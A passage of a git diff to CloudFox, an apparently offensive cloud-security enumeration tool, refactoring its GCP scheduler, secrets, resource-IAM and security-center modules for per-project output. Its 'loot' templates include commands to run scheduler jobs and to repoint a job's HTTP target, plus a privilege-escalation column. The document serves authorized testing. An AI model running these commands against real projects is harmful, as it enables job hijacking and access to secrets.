projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *ResourceIAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allBindings := m.getAllBindings() + header := []string{ "Project ID", "Resource Type", @@ -224,7 +379,7 @@ func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Log // Group bindings by resource resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) resourceOrder := []string{} // Maintain order - for _, b := range m.Bindings { + for _, b := range allBindings { key := resourceKey(b) if _, exists := resourceBindings[key]; !exists { resourceOrder = append(resourceOrder, key) @@ -302,12 +457,14 @@ func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Log }) } - // Collect loot files + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && - !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && + !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 19bc1619..7dda06bf 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -47,9 +47,10 @@ Attack Surface: type SchedulerModule struct { gcpinternal.BaseGCPModule - Jobs []SchedulerService.JobInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectJobs map[string][]SchedulerService.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -74,11 +75,10 @@ func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { module := &SchedulerModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Jobs: []SchedulerService.JobInfo{}, - LootMap: make(map[string]*internal.LootFile), + ProjectJobs: make(map[string][]SchedulerService.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -86,9 +86,13 @@ func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) - if len(m.Jobs) == 0 { + allJobs := m.getAllJobs() + if len(allJobs) == 0 { logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) return } @@ -96,7 +100,7 @@ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { // Count job states enabledCount := 0 httpCount := 0 - for _, job := range m.Jobs { + for _, job := range allJobs { if job.State == "ENABLED" { enabledCount++ } @@ -105,7 +109,7 @@ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { } } - msg := fmt.Sprintf("Found %d job(s)", len(m.Jobs)) + msg := fmt.Sprintf("Found %d job(s)", len(allJobs)) if enabledCount > 0 { msg += fmt.Sprintf(" [%d enabled]", enabledCount) } @@ -117,6 +121,15 @@ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllJobs returns all jobs from all projects +func (m *SchedulerModule) getAllJobs() []SchedulerService.JobInfo { + var all []SchedulerService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -135,10 +148,23 @@ func (m *SchedulerModule) processProject(ctx context.Context, projectID string, return } + // Thread-safe store per-project m.mu.Lock() - m.Jobs = append(m.Jobs, jobs...) + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + } + for _, job := range jobs { - m.addJobToLoot(job) + m.addJobToLoot(projectID, job) } m.mu.Unlock() @@ -150,19 +176,15 @@ func (m *SchedulerModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ -func (m *SchedulerModule) initializeLootFiles() { - m.LootMap["scheduler-commands"] = &internal.LootFile{ - Name: "scheduler-commands", - Contents: "# Scheduler Commands\n" + - "# Generated by CloudFox\n" + - "# WARNING: Only use with proper authorization\n\n", +func (m *SchedulerModule) addJobToLoot(projectID string, job SchedulerService.JobInfo) { + lootFile := m.LootMap[projectID]["scheduler-commands"] + if lootFile == nil { + return } -} -func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { target := formatTargetFull(job) - m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Job: %s (Project: %s, Location: %s)\n"+ "# State: %s\n"+ "# Schedule: %s (%s)\n"+ @@ -174,13 +196,13 @@ func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { ) if job.ServiceAccount != "" { - m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Service Account: %s\n", job.ServiceAccount, ) } - m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe job:\n"+ "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ "# Run job immediately:\n"+ @@ -193,7 +215,7 @@ func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { ) if job.TargetType == "http" { - m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", job.Name, job.Location, job.ProjectID, @@ -205,8 +227,16 @@ func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { // Output Generation // ------------------------------ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Jobs table - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the jobs table +func (m *SchedulerModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Job Name", @@ -216,11 +246,15 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge "Target Type", "Target", "Service Account", + "Priv Esc", "Last Run", } +} +// jobsToTableBody converts jobs to table body rows +func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]string { var body [][]string - for _, job := range m.Jobs { + for _, job := range jobs { // Format target - full, no truncation target := formatTargetFull(job) @@ -230,6 +264,16 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge sa = job.ServiceAccount } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "-" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" + } + } + // Format last run lastRun := "-" if job.LastAttemptTime != "" { @@ -249,27 +293,79 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge job.TargetType, target, sa, + privEsc, lastRun, }) } + return body +} - // Collect loot files - only include if they have content beyond the header - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } +// writeHierarchicalOutput writes output to per-project directories +func (m *SchedulerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Build table files - tableFiles := []internal.TableFile{ - { + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{ Name: globals.GCP_SCHEDULER_MODULE_NAME, - Header: header, + Header: m.getTableHeader(), Body: body, - }, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SchedulerOutput{Table: tableFiles, Loot: lootFiles} } + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SchedulerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }} + output := SchedulerOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 5fe5c4e5..3e4ba6a1 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -34,7 +34,11 @@ Security Columns: - Replication: "automatic" or "user-managed" with locations - Rotation: Whether automatic rotation is enabled - Expiration: Whether the secret has an expiration time/TTL -- VersionDestroyTTL: Delayed destruction period for old versions`, +- VersionDestroyTTL: Delayed destruction period for old versions + +Resource IAM Columns: +- Resource Role: The IAM role granted ON this secret (e.g., roles/secretmanager.secretAccessor) +- Resource Principal: The principal (user/SA/group) who has that role on this secret`, Run: runGCPSecretsCommand, } @@ -44,11 +48,11 @@ Security Columns: type SecretsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Secrets []SecretsService.SecretInfo - LootMap map[string]*internal.LootFile - client *secretmanager.Client - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + client *secretmanager.Client + mu sync.Mutex } // ------------------------------ @@ -82,15 +86,12 @@ func runGCPSecretsCommand(cmd *cobra.Command, args []string) { // Create module instance module := &SecretsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Secrets: []SecretsService.SecretInfo{}, - LootMap: make(map[string]*internal.LootFile), - client: client, + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSecrets: make(map[string][]SecretsService.SecretInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -102,18 +103,28 @@ func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) - // Check results - if len(m.Secrets) == 0 { + // Get all secrets for stats + allSecrets := m.getAllSecrets() + if len(allSecrets) == 0 { logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(m.Secrets)), globals.GCP_SECRETS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(allSecrets)), globals.GCP_SECRETS_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllSecrets returns all secrets from all projects (for statistics) +func (m *SecretsModule) getAllSecrets() []SecretsService.SecretInfo { + var all []SecretsService.SecretInfo + for _, secrets := range m.ProjectSecrets { + all = append(all, secrets...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -132,13 +143,22 @@ func (m *SecretsModule) processProject(ctx context.Context, projectID string, lo return } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Secrets = append(m.Secrets, secrets...) + m.ProjectSecrets[projectID] = secrets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for each secret for _, secret := range secrets { - m.addSecretToLoot(secret) + m.addSecretToLoot(projectID, secret) } m.mu.Unlock() @@ -150,18 +170,16 @@ func (m *SecretsModule) processProject(ctx context.Context, projectID string, lo // ------------------------------ // Loot File Management // ------------------------------ -func (m *SecretsModule) initializeLootFiles() { - m.LootMap["secrets-commands"] = &internal.LootFile{ - Name: "secrets-commands", - Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *SecretsModule) addSecretToLoot(projectID string, secret SecretsService.SecretInfo) { + lootFile := m.LootMap[projectID]["secrets-commands"] + if lootFile == nil { + return } -} -func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { // Extract secret name from full path secretName := getSecretShortName(secret.Name) - m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# SECRET: %s (Project: %s)\n"+ "# ==========================================\n"+ @@ -174,24 +192,24 @@ func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { // KMS key info if secret.KMSKeyName != "" { - m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) } // Rotation info if secret.Rotation == "enabled" { if secret.RotationPeriod != "" { - m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) + lootFile.Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) } if secret.NextRotationTime != "" { - m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) + lootFile.Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) } } // IAM bindings if len(secret.IAMBindings) > 0 { - m.LootMap["secrets-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range secret.IAMBindings { - m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s: %s\n", binding.Role, strings.Join(binding.Members, ", "), @@ -200,7 +218,7 @@ func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { } // Commands - m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe secret:\n"+ "gcloud secrets describe %s --project=%s\n"+ "# List versions:\n"+ @@ -272,8 +290,119 @@ func getSecretMemberType(member string) string { // Output Generation // ------------------------------ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Combined table with IAM columns (one row per IAM member) - header := []string{ + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SecretsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, secrets := range m.ProjectSecrets { + body := m.secretsToTableBody(secrets) + tables := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SecretsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SecretsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allSecrets := m.getAllSecrets() + body := m.secretsToTableBody(allSecrets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the secrets table header +func (m *SecretsModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -286,13 +415,16 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) "Expiration", "Destroy TTL", "Created", - "IAM Role", - "Member Type", - "IAM Member", + "Resource Role", + "Principal Type", + "Resource Principal", } +} +// secretsToTableBody converts secrets to table body rows +func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) [][]string { var body [][]string - for _, secret := range m.Secrets { + for _, secret := range secrets { secretName := getSecretShortName(secret.Name) // Format expiration @@ -374,48 +506,5 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) }) } } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{ - { - Name: globals.GCP_SECRETS_MODULE_NAME, - Header: header, - Body: body, - }, - } - - output := SecretsOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - // Write output using HandleOutputSmart with scope support - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) - m.CommandCounter.Error++ - } + return body } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go index d6f28e07..70c8394c 100644 --- a/gcp/commands/securitycenter.go +++ b/gcp/commands/securitycenter.go @@ -79,13 +79,13 @@ type SecurityCenterModule struct { gcpinternal.BaseGCPModule // Module-specific fields - Findings []SCCFinding - Assets map[string]*SCCAsset // keyed by resource name - Sources []SCCSource - LootMap map[string]*internal.LootFile - mu sync.Mutex - OrgID string - UseOrgLevel bool + ProjectFindings map[string][]SCCFinding + ProjectAssets map[string]map[string]*SCCAsset // projectID -> (resourceName -> SCCAsset) + Sources []SCCSource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool } // ------------------------------ @@ -111,16 +111,13 @@ func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { // Create module instance module := &SecurityCenterModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Findings: []SCCFinding{}, - Assets: make(map[string]*SCCAsset), - Sources: []SCCSource{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFindings: make(map[string][]SCCFinding), + ProjectAssets: make(map[string]map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -146,7 +143,8 @@ func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logg } // Check results - if len(m.Findings) == 0 { + allFindings := m.getAllFindings() + if len(allFindings) == 0 { logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) return @@ -157,7 +155,7 @@ func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logg highCount := 0 mediumCount := 0 lowCount := 0 - for _, f := range m.Findings { + for _, f := range allFindings { switch f.Severity { case "CRITICAL": criticalCount++ @@ -171,12 +169,32 @@ func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logg } logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", - len(m.Findings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + len(allFindings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllFindings aggregates all findings across projects +func (m *SecurityCenterModule) getAllFindings() []SCCFinding { + var allFindings []SCCFinding + for _, findings := range m.ProjectFindings { + allFindings = append(allFindings, findings...) + } + return allFindings +} + +// getAllAssets aggregates all assets across projects +func (m *SecurityCenterModule) getAllAssets() map[string]*SCCAsset { + allAssets := make(map[string]*SCCAsset) + for _, projectAssets := range m.ProjectAssets { + for resourceName, asset := range projectAssets { + allAssets[resourceName] = asset + } + } + return allAssets +} + // ------------------------------ // Project Processor // ------------------------------ @@ -185,6 +203,22 @@ func (m *SecurityCenterModule) processProject(ctx context.Context, projectID str logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) } + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + if m.ProjectAssets[projectID] == nil { + m.ProjectAssets[projectID] = make(map[string]*SCCAsset) + } + m.mu.Unlock() + // List active findings for this project parent := fmt.Sprintf("projects/%s/sources/-", projectID) @@ -219,18 +253,18 @@ func (m *SecurityCenterModule) processProject(ctx context.Context, projectID str sccFinding := m.parseFinding(finding, projectID) m.mu.Lock() - m.Findings = append(m.Findings, sccFinding) + m.ProjectFindings[projectID] = append(m.ProjectFindings[projectID], sccFinding) // Track affected assets if sccFinding.ResourceName != "" { - if asset, exists := m.Assets[sccFinding.ResourceName]; exists { + if asset, exists := m.ProjectAssets[projectID][sccFinding.ResourceName]; exists { asset.FindingCount++ // Update to highest severity if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { asset.Severity = sccFinding.Severity } } else { - m.Assets[sccFinding.ResourceName] = &SCCAsset{ + m.ProjectAssets[projectID][sccFinding.ResourceName] = &SCCAsset{ Name: sccFinding.ResourceName, ResourceName: sccFinding.ResourceName, ResourceType: sccFinding.ResourceType, @@ -320,22 +354,13 @@ func severityRank(severity string) int { // ------------------------------ // Loot File Management // ------------------------------ -func (m *SecurityCenterModule) initializeLootFiles() { - m.LootMap["security-center-commands"] = &internal.LootFile{ - Name: "security-center-commands", - Contents: "# Security Command Center Commands\n" + - "# Generated by CloudFox\n" + - "# WARNING: Only use with proper authorization\n\n", - } -} - func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { // Only add CRITICAL and HIGH severity findings to loot if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { return } - m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( "## Finding: %s (%s)\n"+ "# Category: %s\n"+ "# Resource: %s\n"+ @@ -347,15 +372,15 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st ) if finding.Description != "" { - m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) } if finding.ExternalURI != "" { - m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) } // Add gcloud commands - m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( "\n# View finding details:\n"+ "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", projectID, finding.Name, @@ -365,7 +390,7 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st categoryLower := strings.ToLower(finding.Category) switch { case strings.Contains(categoryLower, "public_bucket"): - m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( "# Remove public access:\n"+ "gsutil iam ch -d allUsers:objectViewer %s\n"+ "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", @@ -373,14 +398,14 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st finding.ResourceName, ) case strings.Contains(categoryLower, "firewall"): - m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( "# Review firewall rule:\n"+ "gcloud compute firewall-rules describe %s --project=%s\n\n", finding.ResourceName, projectID, ) case strings.Contains(categoryLower, "service_account_key"): - m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( "# List service account keys:\n"+ "gcloud iam service-accounts keys list --iam-account=%s\n\n", finding.ResourceName, @@ -392,9 +417,140 @@ func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID st // Output Generation // ------------------------------ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SecurityCenterModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, findings := range m.ProjectFindings { + // Sort findings by severity + sort.Slice(findings, func(i, j int) bool { + return severityRank(findings[i].Severity) > severityRank(findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table for this project + assetsHeader := []string{ + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + if projectAssets, ok := m.ProjectAssets[projectID]; ok { + for _, asset := range projectAssets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return 